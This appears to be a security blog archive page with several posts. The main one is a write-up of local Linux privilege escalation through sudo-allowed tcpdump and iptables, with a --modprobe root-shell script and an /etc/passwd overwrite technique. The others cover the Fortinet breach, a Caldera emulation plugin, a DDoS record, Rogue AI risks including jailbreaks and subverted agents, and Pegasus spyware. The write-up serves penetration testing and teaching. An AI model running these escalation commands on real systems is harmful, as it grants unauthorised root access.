Cyber Attacks

A Journey From sudo iptables To Local Privilege Escalation

Posted on November 3, 2024 - November 3, 2024 by Maq Verma

TL;DR

A low-privileged user on a Linux machine can obtain the root privileges if:

They can execute iptables and iptables-save with sudo as they can inject a fake /etc/passwd entry in the comment of an iptables rule and then abusing iptables-save to overwrite the legitimate /etc/passwd file.
They can execute iptables with sudo and the underlying system misses one of the kernel modules loaded by iptables. In this case they can use the --modprobe argument to run an arbitrary command.

Intro

If you’ve ever played with boot2root CTFs (like Hack The Box), worked as a penetration tester, or just broke the law by infiltrating random machines (NO, DON’T DO THAT), chances are good that you found yourself with a low-privileged shell – www-data, I’m looking at you – on a Linux machine.

Now, while shells are great and we all need to be grateful when they shine upon us, a low-privileged user typically has a limited power over the system. The path ahead becomes clear: we need to escalate our privileges to root.

When walking the path of the Privilege Escalation, a hacker has a number of tricks at their disposal; one of them is using sudo.

superuser do…substitute user do…just call me sudo

As the reader might already know well, the sudo command can be used to run a command with the permissions of another user – which is commonly root.

Ok, but what’s the point? If you can sudo <command> already, privilege escalation is complete!

Well, yes, but actually, no. In fact, there are two scenarios (at least, two that come to mind right now) where we can’t simply leverage sudo to run arbitrary commands:

Running sudo requires the password of the user, and even though we have a shell, we don’t know the password. This is quite common, as the initial access to the box happens via an exploit rather than regular authentication.
We may know the password for sudo, but the commands that the user can run with sudo are restricted.

In the first case, there’s only one way to leverage sudo for privilege escalation, and that is NOPASSWD commands. These are commands that can be launched with sudo by the user without a password prompt. Quoting from man sudoers:

NOPASSWD and PASSWD

By default, sudo requires that a user authenticate him or herself before running a command. This behavior can be modified via the NOPASSWD tag. Like a Runas_Spec, the NOPASSWD tag sets a default for the commands that follow it in the Cmnd_Spec_List. Conversely, the PASSWD tag can be used to reverse things. For example:

ray rushmore = NOPASSWD: /bin/kill, /bin/ls, /usr/bin/lprm would allow the user ray to run /bin/kill, /bin/ls, and /usr/bin/lprm as root on the machine rushmore without authenticating himself.

The second case is a bit different: in that scenario, even though we know the password, there will be only a limited subset of commands (and possibly arguments) that can be launched with sudo. Again, the way this works you can learn by looking at man sudoers, asking ChatGPT or wrecking your system by experimenting.

In both cases, there is a quick way to check what are the “rules” enabled for your user, and that is running sudo -l on your shell, which will help answering the important question: CAN I HAZ SUDO?

$ sudo run-privesc

Now, back to the topic of privilege escalation. The bad news is that, when sudo is restricted, we cannot run arbitrary commands, thus the need for some more ingredients to obtain a complete privilege escalation. How? This is the good news: we can leverage side-effects of allowed commands. In fact, Linux utilities, more often than not, support a plethora of flags and options to customize their flow. By using and chaining these options in creative ways, even a simple text editor can be used as a trampoline to obtain arbitrary execution!

For a simple use case, let’s consider the well-known tcpdump command, used to listen, filter and display network packets traveling through the system. Administrators will oftentimes grant low-privileged users the capability to dump traffic on the machine for debugging purposes, so it’s perfectly common to find an entry like this when running sudo -l:

`1`	`(ALL) NOPASSWD: /usr/bin/tcpdump`

Little do they know about the power of UNIX utilities! In fact, tcpdump automagically supports log rotation, alongside a convenient -z flag to supply a postrotate-command that is executed after every rotation. Therefore, it is possible to leverage sudo coupled with tcpdump to execute arbitrary commands as root by running the following sequence of commands:

1 2 3 4 5 COMMAND='id' # just replace 'id' with your evil command TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

The good folks at GTFOBins maintain a curated list of these magic tricks (including the one just shown about tcpdump), so please bookmark it and make sure to look it up on your Linux privilege escalation quests!

Starting Line 🚦

Recently, during a penetration test, we were looking for a way to escalate our privileges on a Linux-based device. What we had was a shell for a (very) low-privileged user, and the capability to run a certain set of commands as sudo. Among these, two trusted companions for every network engineer: iptables and iptables-save.

Sure there must be an entry for one of these two guys in GTFOBins, or so we thought … which lead in going once more for the extra mile™.

Pepperidge Farm Remembers

Back in the 2017 we organized an in-person CTF in Turin partnering with the PoliTO University, JEToP, and KPMG.

The CTF was based on a set of boot2root boxes where the typical entry point was a web-based vulnerability, followed by a local privilege escalation. One of the privilege escalations scenarios we created was exactly related to iptables.

The technique needed to root the box has been documented in a CTF writeup and used to root a PAX payment device.

Modeprobing Our Way To Root

iptables has a --modprobe, which purpose we can see from its man page:

--modprobe=command
When adding or inserting rules into a chain, use command to load any necessary modules (targets, match extensions, etc).

Sounds like an interesting way for to run an arbitrary command, doesn’t it?

By inspecting the iptables source code we can see that if the --modprobe flag has been specifies, then the int xtables_load_ko(const char *modprobe, bool quiet) function is called with as first parameter the modprobe command specified by the user.

As a first step the xtables_load_ko function checks if the required modules have been already loaded, while if they have been not it calls the int xtables_insmod(const char *modname, const char *modprobe, bool quiet) function with as second parameter the modprobe command specified by the user.

Finally, the xtables_insmod function runs the command we specified in the --modprobe argument using the execv syscall:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 int xtables_insmod(const char *modname, const char *modprobe, bool quiet) { char *buf = NULL; char *argv[4]; int status; /* If they don't explicitly set it, read out of kernel */ if (!modprobe) { buf = get_modprobe(); if (!buf) return -1; modprobe = buf; } /* * Need to flush the buffer, or the child may output it again * when switching the program thru execv. */ fflush(stdout); switch (vfork()) { case 0: argv[0] = (char *)modprobe; argv[1] = (char *)modname; if (quiet) { argv[2] = "-q"; argv[3] = NULL; } else { argv[2] = NULL; argv[3] = NULL; } execv(argv[0], argv); /* not usually reached */ exit(1); case -1: free(buf); return -1; default: /* parent */ wait(&status); } free(buf); if (WIFEXITED(status) && WEXITSTATUS(status) == 0) return 0; return -1; }

Wrapping all together, if we can run iptables as root then we can abuse it to run arbitrary system commands and with the following script being greeted with an interactive root shell:

1 2 3 4 5 #!/bin/bash echo -e "/bin/bash -i" > run-me chmod +x run-me sudo iptables -L -t nat --modprobe=./run-me

EOF?

While this technique is quite powerful, it has an important requirement: the kernel modules iptables is trying to access should not be loaded.

(Un)fortunately, in most of the modern Linux distributions they are, making the attack impracticable. That being said, it is still powerful when it comes to embedded devices as demonstrated by Giulio.

What about our target? Unlikely it had all the kernel modules loaded, so this technique couldn’t be applied. Time to find a new one then 👀

フュージョン

Time for the Metamoran Fusion Dance!

The lab

Before diving into the privilege escalation steps, let’s setup a little lab to experiment with.

To test this, you can do the following things on a fresh Ubuntu 24.04 LTS machine:

Install the iptables package via apt-get.
Add the following lines to the /etc/sudoers file:

1 2 user ALL=(ALL) NOPASSWD: /usr/bin/iptables user ALL=(ALL) NOPASSWD: /usr/bin/iptables-save

Comment out, in the same file, the line:

`1`	`%sudo ALL=(ALL:ALL) ALL`

As expected, running sudo -l will yield the following response:

1 2 3 4 5 6 7 user@ubuntu:~$ sudo -l Matching Defaults entries for user on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User user may run the following commands on ubuntu: (ALL) NOPASSWD: /usr/bin/iptables (ALL) NOPASSWD: /usr/bin/iptables-save

So either running sudo iptables or sudo iptables-save executes the command without asking for authentication.

In the next section, we’ll see how an attacker in this system can escalate their privileges to root.

Evilege Priscalation

This section will demonstrate how core and side features of the iptables and iptables-save commands, plus some Linux quirks, can be chained together in order to obtain arbitrary code execution.

Spoiler alert, it boils down to these three steps:

Using the comment functionality offered by iptables to attach arbitrary comments, containing newlines, to rules.
Leverage iptables-save to dump to a sensitive file the content of the loaded rules, including the comment payloads.
Exploiting step 1 and step 2 to overwrite the /etc/passwd file with an attacker-controlled root entry, crafted with a known password.

In the following sections, we will give some more details on these steps.

Step 1: Commenting Rules via iptables

Let’s consider a simple iptables command to add a firewall rule:

`1`	`sudo iptables -A INPUT -i lo -j ACCEPT`

the effect of this rule is to append a rule to the input chain to accept every inbound packet where the input interface is the local one. We can immediately verify the effect of this rule by running sudo iptables -L. The output of this command, as expected, contains the ACCEPT rule that we just loaded.

By looking into interesting flags supported by iptables, we stumble on this one:

comment

Allows you to add comments (up to 256 characters) to any rule. –comment comment Example: iptables -A INPUT -s 192.168.0.0/16 -m comment –comment “A privatized IP block”

Let’s test this by slightly modifying our previous rule:

`1`	`sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment "Allow packets to localhost"`

Then again, listing the rules, we can see the effect of the comment:

1 2 3 4 5 6 7 8 9 10 Chain INPUT (policy ACCEPT) target prot opt source destination ACCEPT all -- anywhere anywhere ACCEPT all -- anywhere anywhere /* Allow packets to localhost */ Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination

iptables also provides a way to simply dump all the loaded rules, by running iptables -S:

1 2 3 4 5 -P INPUT ACCEPT -P FORWARD ACCEPT -P OUTPUT ACCEPT -A INPUT -i lo -j ACCEPT -A INPUT -i lo -m comment --comment "Allow packets to localhost" -j ACCEPT

How much can we control this output? A simple test is to insert a newline:

`1`	`sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'Allow packets to localhost\nThis rule rocks!'`

NOTE

By using the $’ quoting, we can instruct bash to replace the \n character with a newline!

Now, let’s dump again the loaded rules to check whether the newline was preserved:

1 2 3 4 5 6 7 8 $ sudo iptables -S -P INPUT ACCEPT -P FORWARD ACCEPT -P OUTPUT ACCEPT -A INPUT -i lo -j ACCEPT -A INPUT -i lo -m comment --comment "Allow packets to localhost" -j ACCEPT -A INPUT -i lo -m comment --comment "Allow packets to localhost This rule rocks!" -j ACCEPT

This is definitely interesting – we’ve established that iptables preserves newlines in comments, which means that we can control multiple arbitrary lines in the output of an iptables rule dump.

…can you guess how this can be leveraged?

Step 2: Arbitrary File Overwrite via iptables-save

Before starting to shoot commands out, let’s RTFM:

iptables-save and ip6tables-save are used to dump the contents of IP or IPv6 Table in easily parseable format either to STDOUT or to a speci‐ fied file.

If this man page is right (it probably is), by simply running iptables-save without specifying any file, the rules will be dumped to STDOUT:

1 2 3 4 5 6 7 8 9 10 11 12 $ sudo iptables-save # Generated by iptables-save v1.8.10 (nf_tables) on Tue Aug 13 19:50:55 2024 *filter :INPUT ACCEPT [936:2477095] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] -A INPUT -i lo -j ACCEPT -A INPUT -i lo -m comment --comment "Allow packets to localhost" -j ACCEPT -A INPUT -i lo -m comment --comment "Allow packets to localhost This rule rocks!" -j ACCEPT COMMIT # Completed on Tue Aug 13 19:50:55 2024

it seems iptables-save, too, is preserving the injected newline. Now that we know this, we can proceed to test its functionality by specifying a filename, supplying the -f switch. The output shows us we’re onto a good path:

The screenshot gives us two important informations:

We can control arbitrary lines on the file written by iptables-save.
Since this is running with sudo, the file is owned by root.

Where can we point this armed weapon? Onto the next section!

Step 3: Crafting Root Users

Recap: by leveraging arbitrary comments containing \n via iptables, and running iptables-save, we can write arbitrary files as root, and we partially control its lines – partially, yes, because the iptables-save outputs some data that can’t be controlled, before and after our injected comment.

How can this be useful? Well, there’s at least one way to turn this into a good privilege escalation, and it is thanks to the (in)famous /etc/passwd file. In fact, this file contains entries for each user that can log into the system, which includes metadata such as the hash of the password, and the UID of the user. Can you see where this is going?

Yes, we’re going to write a perfectly valid passwd root entry into an iptables rule, and we’re going to overwrite the /etc/passwd file via iptables-save. Since the injected line will also contain the password hash of the user, after the overwrite happens, we should be able to simply run su root and input the injected password.

At this point, we only have one doubt: will the other lines (which are not valid entries) break the system beyond repair? Clearly, there’s only one way to find out.

Proof of Concept

The steps to reproduce the privilege escalation are simple:

Encrypt the new root password in the right format by running openssl passwd <password>
Take the entry for root in the /etc/passwd, and copy it somewhere, replacing the x value of the encrypted password with the value generated at step 2
Inject the forged root entry in a new iptables rule comment

Overwrite /etc/passwd by running sudo iptables-save -f /etc/passwd

Verify that you can now su root with the password chosen at step 1

Limitations & Possible Improvements

The main limitation of this technique lies in its reduced likelihood: in fact, in order for the privilege escalation to be executed, a user must be granted sudo on both the iptables and iptables-save commands; while this certainly happens in the wild, it would be great if we could make this scenario even more likely. This might be doable: iptables-save is actually part of the iptables suite, as the latter supports an argv[0]-based aliasing mechanism to select from the full suite the command to run. Therefore, if it were possible to force iptables to act as iptables-save, then the iptables-save command would not be necessary anymore.

Moreover, while for this scenario overwriting /etc/passwd was provably enough, your imagination is the limit: there might be other interesting gadgets to use in a Linux system! Mostly, the requirements for a “good” overwrite target are:

It must split “entries” by newlines.
It must ignore invalid, junk lines.

Fortinet Confirms Third-Party Data Breach Amid Hacker’s 440 GB Theft Claim

Posted on November 3, 2024 - November 3, 2024 by Maq Verma

Fortinet, a major player in the global cybersecurity sector, has disclosed a data breach involving a third-party service, affecting a small number of its Asia-Pacific customers. The breach reportedly exposed limited customer data stored on a cloud-based shared file drive used by Fortinet. However, a hacker, operating under the alias “Fortibitch,” has claimed responsibility for stealing 440 GB of data from the company and leaking it online.

Fortinet’s operations primarily cater to the enterprise sector, offering endpoint security solutions, firewall management, and cloud security services. With a market valuation of $60 billion, it ranks among the top cybersecurity firms globally, alongside Palo Alto Networks and CrowdStrike. Its customers span various sectors, including critical infrastructure and government agencies across Five Eyes nations.

Fortinet’s incident disclosure

In a statement released to Australian media Cyber Daily, Fortinet confirmed that an unauthorized individual gained access to a third-party cloud drive used by the company. The breach is reportedly limited to a small subset of files, and Fortinet assured that the compromised data involved a restricted number of customers. The company has since notified the affected clients and emphasized that, so far, there is no evidence of malicious activity targeting its customers.

“An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number of Fortinet customers. We have communicated directly with customers as appropriate,” a Fortinet spokesperson stated. The company also affirmed that the breach has not impacted its operations, products, or services, downplaying any broader implications.

Cyber Daily also reported that the Australian National Office of Cyber Security has acknowledged the incident, stating that they are aware of the reports and ready to assist if needed. At present, no details have emerged regarding the potential involvement of Australian federal government data or critical infrastructure.

Hacker’s claims of data theft

In contrast to Fortinet’s more cautious statement, a hacker who goes by “Fortibitch” made bold claims on BreachForums, a notorious cybercrime platform. The hacker asserts that 440 GB of data has been extracted from Fortinet’s Azure SharePoint, where the files were allegedly stored.

The post includes the credentials to access this data through an S3 bucket. However, this is more of a proof of the breach to the firm and the public, rather than an offering to anyone with the means to retrieve it, as access to that database should be closed now.

The threat actor also referenced Fortinet’s recent acquisitions of Next DLP and Lacework, suggesting the data loss resulted during system/data migrations, which is a particularly risky period for organizations. In the same post, the hacker taunted Fortinet’s founder, Ken Xie, accusing him of abandoning ransom negotiations. The hacker questioned why Fortinet had not yet filed an SEC 8-K disclosure, which would be required for significant incidents affecting publicly traded companies.

CyberInsider has contacted Fortinet to independently confirm if their incident disclosure is connected to the threat actor’s claims, and we will update this story as soon as we hear back from the infosec giant.

Update: Fortinet published an announcement about the incident, clarifying that there was no ransomware or encryption involved, yet still not addressing the validity of the threat actor’s claims.

Adversary Emulation is a Complicated Profession – Intelligent Cyber Adversary Emulation with the Bounty Hunter

Posted on November 3, 2024 - November 3, 2024 by Maq Verma

Cyber Adversary Emulation

Cyber adversary emulation is an assessment method where tactis, techniques, and procedures (TTPs) of real-world attackers are used to test the security controls of a system. It helps to understand how an attacker might penetrate defenses, to evaluate installed security mechanisms and to improve the security posture by addressing identified weaknesses. Furthermore, it allows running training scenarios for security professionals, e.g., in cyber ranges where practical exercises can be performed. Unfortunately, adversary emulation requires significant time, effort, and specialized professionals to conduct.

Cyber Adversary Emulation Tools

In order to reduce the costs and increase the effectiveness of security assessments, adversary emulation tools can be used to automate the emulation of real-world attackers. Also, such tools include built-in logging and reporting features that simplify documenting the assessment. Thus, assessments become more accessible for less experienced personnel and more resource-efficient when using adversary emulation tools. But the automation process also has drawbacks, e.g., they often depend on predefined playbooks resulting in limited scenario coverage, a lack of adaptability, and a high predictability. As a consequence, simulated attacks fail more often and trainee personnel might recognize an attacker from previous scenarios, resulting in a lower quality in training experience.

Introducing Caldera and its Decision Engine

Caldera is an open-source, plugin-based cybersecurity platform developed by MITRE that can be used to emulate cyber adversaries. It does not depend on playbooks as strongly as other adversary emulation tools do – instead it uses adversary profiles and planners. While adversary profiles contain attacks steps to execute, the planners are unique decision logics that decide if, when, and how a step should be executed. Even though Caldera comes with several planners out-of-the-box, it still has some limitations: (1) Repeating a scenario results in the same behavior since the planners make deterministic decisions, (2) only post-compromise methods are supported, and (3) simulated attack behavior can be unrealistic due to planner limitations. To overcome these limitations, we developed and implemented a new plugin for Caldera – the Bounty Hunter.

The Bounty Hunter

The Bounty Hunter is a novel plugin for Caldera. Its biggest asset is the Bounty Hunter Planner that allows the emulation of complete, realistic cyberattack chains. Bounty Hunter’s key features are:

Weighted-Random Attack Behavior. The Bounty Hunter’s attack behavior is goal-oriented and reward-driven, similar to Caldera’s Look-Ahead Planner. But instead of picking the ability with the highest future reward value every time, it offers the possibility to pick the next ability weighted-randomly. This adds an uncertainty to the planner’s behavior which allows repeated runs of the same operation with different results. This is especially useful in training environments.
Support for Initial Access and Privilege Escalation. At the moment, no Caldera planner offers support for initial access or privilege escalation methods. The Bounty Hunter extends Caldera’s capabilities by offering support for both in a fully autonomous manner. This enables it to emulate complete cyberattack chains.
Further Configurations for More Sophisticated and Realistic Attack Behavior. The Bounty Hunter offers various configuration parameters, e.g., “locking” abilities, reward updates, and final abilities, to customize the emulated attack behavior.

The following two sections introduce two example scenarios to showcase the capabilities of the Bounty Hunter. The first example describes how it emulates complete cyberattack chains, including initial access and privilege escalation. In the second scenario, the Bounty Hunter is tasked to emulate a multistep attack based on an APT29 campaign to demonstrate the level of complexity that it can achieve.

Scenario #1 – Initial Access and Privilege Escalation

This example scenario demonstrates how the Bounty Hunter is able to perform initial access and privilege escalation autonomously. The results of the demo operation using the Bounty Hunter and a demo adversary profile are shown in the picture below. The operation is started with a Caldera agent (yjjtqs) running on the same machine as the Caldera server, i.e., a machine that is already controlled by the adversary.

As first step, the Bounty Hunter executes a Nmap host scan to find potential targets, followed by a Nmap port scan of found systems to gather information about them. Depending on the gathered port as well as service and version information, an initial access agenda is chosen and executed. In this scenario, the emulated adversary found an open SSH port and decides to try an SSH brute force attack. It successfully gathers valid SSH credentials and uses them to copy and start a new Caldera agent on the target machine (ycchap). Next, the Bounty Hunter detects that it needs elevated privileges for its chosen final ability (Credential Dumping) and decides to start a privilege escalation by running a UAC Bypass. As a result of this step, a new elevated agent was started (ebdwxy) and the final ability can be executed, concluding the operation.


Example operation to demonstrate Initial Access and Privilege Escalation with the Bounty Hunter and a demo adversary profile. Note how three different agents are used during the different phases.

Scenario #2 – Emulating an APT29 Campaign

The level of complexity the Bounty Hunter supports was tested using the APT29 Day2 data from the adversary emulation library of the Center for Threat Informed Defense. The resulting attack chain including fact-links between steps is shown in the figure below. The test showed that the Bounty Hunter is able to initially access a Windows Workstation using SSH brute force, elevate its privileges automatically using a Windows UAC Bypass, and finally compromise the whole domain using a Kerberos Golden Ticket Attack.

To achieve its goal, the Bounty Hunter was only provided with a high reward of the final ability that executes a command using the Golden Ticket and the name of the interface to scan initially. All other information needed for the successful execution, including the domain name, domain admin credentials, SID values, and NTLM hashes, were collected autonomously.


Example operation to demonstrate the level of complexity the Bounty Hunter supports based on an APT29 campaign. During the campaign, a Windows Active Directory Domain is compromised by running a Kerberos Golden Ticket Attack.

Configuration of the Bounty Hunter

The Bounty Hunter can be configured in various ways to further customize the emulated attack behavior. Possible configurations range from custom ability rewards, over final and locked abilities to custom ability reward updates. For detailed information on the configuration possibilities, please refer to the description in the GitHub repository .

Conclusion

Cyber adversary emulation is complicated and different approaches suffer from different drawbacks. Common challenges of cyber adversary emulation tools (such as the well-known cybersecurity platform Caldera) are their predictability and limitations in their scope. To overcome these challenges, we developed and implemented a new Caldera plugin – the Bounty Hunter. The capabilities of the Bounty Hunter were demonstrated in two different scenarios, showing that it is capable of emulating initial access and privilege escalation methods as well as handling complex, multistep cyberattack chains, e.g., an attack based on an APT29 campaign.

The Bounty Hunter is released open-source on GitHub with (deliberately unsophisticated) proof-of-concept attacks for Windows and Linux targets.

Cloudflare blocks largest recorded DDoS attack peaking at 3.8Tbps

Posted on November 3, 2024 - November 3, 2024 by Maq Verma

During a distributed denial-of-service campaign targeting organizations in the financial services, internet, and telecommunications sectors, volumetric attacks peaked at 3.8 terabits per second, the largest publicly recorded to date. The assault consisted of a “month-long” barrage of more than 100 hyper-volumetric DDoS attacks flooding the network infrastructure with garbage data.

In a volumetric DDoS attack, the target is overwhelmed with large amounts of data to the point that they consume the bandwidth or exhaust the resources of applications and devices, leaving legitimate users with no access.

Asus routers, MikroTik devices, DVRs, and web servers

Many of the attacks aimed at the target’s network infrastructure (network and transport layers L3/4) exceeded two billion packets per second (pps) and three terabits per second (Tbps).

According to researchers at internet infrastructure company Cloudflare, the infected devices were spread across the globe but many of them were located in Russia, Vietnam, the U.S., Brazil, and Spain.

Origin of the 3.8 DDoS attack — **DDoS packets delivered from all over the world**
*source: Cloudflare*

The threat actor behind the campaign leveraged multiple types of compromised devices, which included a large number of Asus home routers, Mikrotik systems, DVRs, and web servers.

Cloudflare mitigated all the DDoS attacks autonomously and noted that the one peaking at 3.8 Tbps lasted 65 seconds.

Largest volumetric DDoS attack peaked at 3.8Tbps — Largest publicly recorded volumetric DDoS attack peaking at 3.8Tbps

The researchers say that the network of malicious devices used mainly the User Datagram Protocol (UDP) on a fixed port, a protocol with fast data transfers but which does not require establishing a formal connection.

Previously, Microsoft held the record for defending against the largest volumetric DDoS attack of 3.47 Tbps, which targeted an Azure customer in Asia.

Typically, threat actors launching DDoS attacks rely on large networks of infected devices (botnets) or look for ways to amplify the delivered data at the target, which requires a smaller number of systems.

In a report this week, cloud computing company Akamai confirmed that the recently disclosed CUPS vulnerabilities in Linux could be a viable vector for DDoS attacks.

After scanning the public internet for systems vulnerable to CUPS, Akamai found that more than 58,000 were exposed to DDoS attacks from exploiting the Linux security issue.

More testing revealed that hundreds of vulnerable “CUPS servers will beacon back repeatedly after receiving the initial requests, with some of them appearing to do it endlessly in response to HTTP/404 responses.”

These servers sent thousands of requests to Akamai’s testing systems, showing significant potential for amplification from exploiting the CUPS flaws.

Rogue AI: What the Security Community is Missing

Posted on November 3, 2024 - November 3, 2024 by Maq Verma

Who’s doing what?

Different parts of the security community have different perspectives on Rogue AI:

OWASP focuses on vulnerabilities and mitigations, with its Top 10 for LLM Applications report, and high-level guidance in its LLM AI Cybersecurity and Governance Checklist
MITRE is concerned with attack tactics and techniques, via an ATLAS matrix that extends MITRE ATT&CK to AI systems
A new AI Risk Repository from MIT provides an online database of over 700 AI risks categorized by cause and risk domain

Let’s take a look at each in turn.

OWASP

Rogue AI is related to all of the Top 10 large language model (LLM) risks highlighted by OWASP, except perhaps for LLM10: Model Theft, which signifies “unauthorized access, copying, or exfiltration of proprietary LLM models.” There is also no vulnerability associated with “misalignment”—i.e., when an AI has been compromised or is behaving in an unintended manner.

Misalignment:

Could be caused by prompt injection, model poisoning, supply chain, insecure output or insecure plugins
Can have greater Impact in a scenario of LLM09: Overreliance (in the Top 10)
Could result in Denial of Service (LLM04), Sensitive Information Disclosure (LLM06) and/or Excessive Agency (LLM08)

Excessive Agency is particularly dangerous. It refers to situations when LLMs “undertake actions leading to unintended consequences,” and stems from excessive functionality, permissions or autonomy. It could be mitigated by ensuring appropriate access to systems, capabilities and use of human-in-the-loop.

OWASP does well in the Top 10 at suggesting mitigations for Rogue AI (which is a subject we’ll return to), but doesn’t deal with causality: i.e., whether an attack is intentional or not. Its security and governance document also offers a handy and actionable checklist for securing LLM adoption across multiple dimensions of risk. It highlights shadow AI as the “most pressing non-adversary LLM threat” for many organizations. Rogues thrive in shadow, and lack of AI governance is already AI use beyond policy. Lack of visibility into Shadow AI systems prevents understanding of their alignment.

MITRE ATLAS

MITRE’s tactics techniques and procedures (TTPs) are a go-to resource for anyone involved in cyber-threat intelligence—helping to standardize analysis of the many steps in the kill chain and enabling researchers to identify specific campaigns. Although ATLAS extends the ATT&CK framework to AI systems, it doesn’t address Rogue AI directly. However, Prompt Injection, Jailbreak and Model Poisoning, which are all ATLAS TTPs, can be used to subvert AI systems and thereby create Rogue AI.

The truth is that these subverted Rogue AI systems are themselves TTPs: agentic systems can carry out any of the ATT&CK tactics and techniques (e.g., Reconnaissance, Resource Development, Initial Access, ML Model Access, Execution) for any Impact. Fortunately, only sophisticated actors can currently subvert AI systems for their specific goals, but the fact that they’re already checking for access to such systems should be concerning.

Although MITRE ATLAS and ATT&CK deal with Subverted Rogues, they do not yet address Malicious Rogue AI. There’s been no example to date of attackers installing malicious AI systems in target environments, although it’s surely only a matter of time: as organizations begin adopting agentic AI so will threat actors. Once again, using an AI to attack in this way is its own technique. Deploying it remotely is like AI malware, and more besides—just as using proxies with AI services as attackers is like an AI botnet, but also a bit more.

MIT AI Risk Repository

Finally, there’s MIT’s risk repository, which includes an online database of hundreds of AI risks, as well as a topic map detailing the latest literature on the subject. As an extensible store of community perspective on AI risk, it is a valuable artifact. The collected risks allow more comprehensive analysis. Importantly, it introduces the topic of causality, referring to three main dimensions:

Who caused it (human/AI/unknown)
How it was caused in AI system deployment (accidentally or intentionally)
When it was caused (before, after, unknown)

Intent is particularly useful in understanding Rogue AI, although it’s only covered elsewhere in the OWASP Security and Governance Checklist. Accidental risk often stems from a weakness rather than a MITRE ATLAS attack technique or an OWASP vulnerability.

Who the risk is caused by can also be helpful in analyzing Rogue AI threats. Humans and AI systems can both accidentally cause Rogue AI, while Malicious Rogues are, by design, intended to attack. Malicious Rogues could theoretically also try to subvert existing AI systems to go rogue, or be designed to produce “offspring”—although, at present, we consider humans to be the main intentional cause of Rogue AI.

Understanding when the risk is caused should be table stakes for any threat researcher, who needs to have situational awareness at all points in the AI system lifecycle. That means pre- and post-deployment evaluation of systems and alignment checks to catch malicious, subverted or accidental Rogue AIs.

MIT divides risks into seven key groups and 23 subgroups, with Rogue AI directly addressed in the “AI System Safety, Failures and Limitations” domain. It defines it thus:

“AI systems that act in conflict with ethical standards or human goals or values, especially the goals of designers or users. These misaligned behaviors may be introduced by humans during design and development, such as through reward hacking and goal mis-generalization, and may result in AI using dangerous capabilities such as manipulation, deception, or situational awareness to seek power, self-proliferate, or achieve other goals.”

Defense in depth through causality and risk context

The bottom line is that adopting AI systems increases the corporate attack surface—potentially significantly. Risk models should be updated to take account of the threat from Rogue AI. Intent is key here: there’s plenty of ways for accidental Rogue AI to cause harm, with no attacker present. And when harm is intentional, who is attacking whom with what resources is critical context to understand. Are threat actors, or Malicious Rogue AI, targeting your AI systems to create subverted Rogue AI? Are they targeting your enterprise in general? And are they using your resources, their own, or a proxy whose AI has been subverted.

These are all enterprise risks, both pre- and post-deployment. And while there’s some good work going on in the security community to better profile these threats, what’s missing in Rogue AI is an approach which includes both causality and attack context. By addressing this gap, we can start to plan for and mitigate Rogue AI risk comprehensively.

In-depth analysis of Pegasus spyware and how to detect it on your iOS device

Posted on October 2, 2024 - October 2, 2024 by Maq Verma

How does Pegasus and other spyware work discreetly to access everything on your iOS device?
Introduction

In today’s digital age, mobile phones and devices have evolved from being exclusive to a few to becoming an absolute need for everyone, aiding us in both personal and professional pursuits. However, these devices, often considered personal, can compromise our privacy when accessed by nefarious cybercriminals.

Malicious mobile software has time and again been wielded as a sneaky weapon to compromise the sensitive information of targeted individuals. Cybercriminals build complex applications capable of operating on victims’ devices unbeknownst to them, concealing the threat and the intentions behind it. Despite the common belief among iOS users that their devices offer complete security, shielding them from such attacks, recent developments, such as the emergence of Pegasus spyware, have shattered this pretense.

The first iOS exploitation by Pegasus spyware was recorded in August 2016, facilitated through spear-phishing attempts—text messages or emails that trick a target into clicking on a malicious link.

What is Pegasus spyware?

Developed by the Israeli company NSO Group, Pegasus spyware is malicious software designed to gather sensitive information from devices and users illicitly. Initially licensed by governments for targeted cyber espionage purposes, it is a sophisticated tool for remotely placing spyware on targeted devices to pry into and reveal information. Its ‘zero-click’ capability makes it particularly dangerous as it can infiltrate devices without any action required from the user.

Pegasus can gather a wide range of sensitive information from infected devices, including messages, audio logs, GPS location, device information, and more. It can also remotely activate the device’s camera and microphone, essentially turning the device into a powerful tool for illegal surveillance.

Over time, NSO Group has become more creative in its methods of unwarranted intrusions into devices. The company, which was founded in 2010, claims itself to be a “leader” in mobile and cellular cyber warfare.

Pegasus is also capable of accessing data from both iOS and Android-powered devices. The fact that it can be deployed through convenient gateways such as SMS, WhatsApp, or iMessage makes it an effortless tool to trick users into installing the spyware without their knowledge. This poses a significant threat to the privacy and security of individuals and organizations targeted by such attacks.

How does Pegasus spyware work?

Pegasus is extremely efficient due to its strategic development to use zero-day vulnerabilities, code obfuscation, and encryption. NSO Group provides two methods for remotely installing spyware on a target’s device: a zero-click method and a one-click method. The one-click method includes sending the target a regular SMS text message containing a link to a malicious website. This website then exploits vulnerabilities in the target’s web browser, along with any additional exploits needed to implant the spyware.

Zero-click attacks do not require any action from device users to establish an unauthorized connection, as they exploit ‘zero-day’ vulnerabilities to gain entry into the system. Once the spyware is installed, Pegasus actively captures the intended data about the device. After installation, Pegasus needs to be constantly upgraded and managed to adapt to device settings and configurations. Additionally, it may be programmed to uninstall itself or self-destruct if exposed or if it no longer provides valuable information to the threat actor.

Now that we’ve studied what Pegasus is and the privacy concerns it raises for users, this blog will further focus on discussing precautionary and investigation measures. The suggested methodology can be leveraged to detect not just Pegasus spyware but also Operation Triangulation, Predator spyware, and more.

Let’s explore how to check iOS or iPadOS devices for signs of compromise when only an iTunes backup is available and obtaining a full file system dump isn’t a viable option.

In recent years, targeted attacks against iOS devices have made headlines regularly. Although the infections are not widespread and they hardly affect more than 100 devices per wave, such attacks still pose serious risks to Apple users. The risks have appeared as a result of iOS becoming an increasingly complex and open system, over the years, to enhance user experience. A good example of this is the flawed design of the iMessage application, which wasn’t protected through the operating system’s sandbox mechanisms.

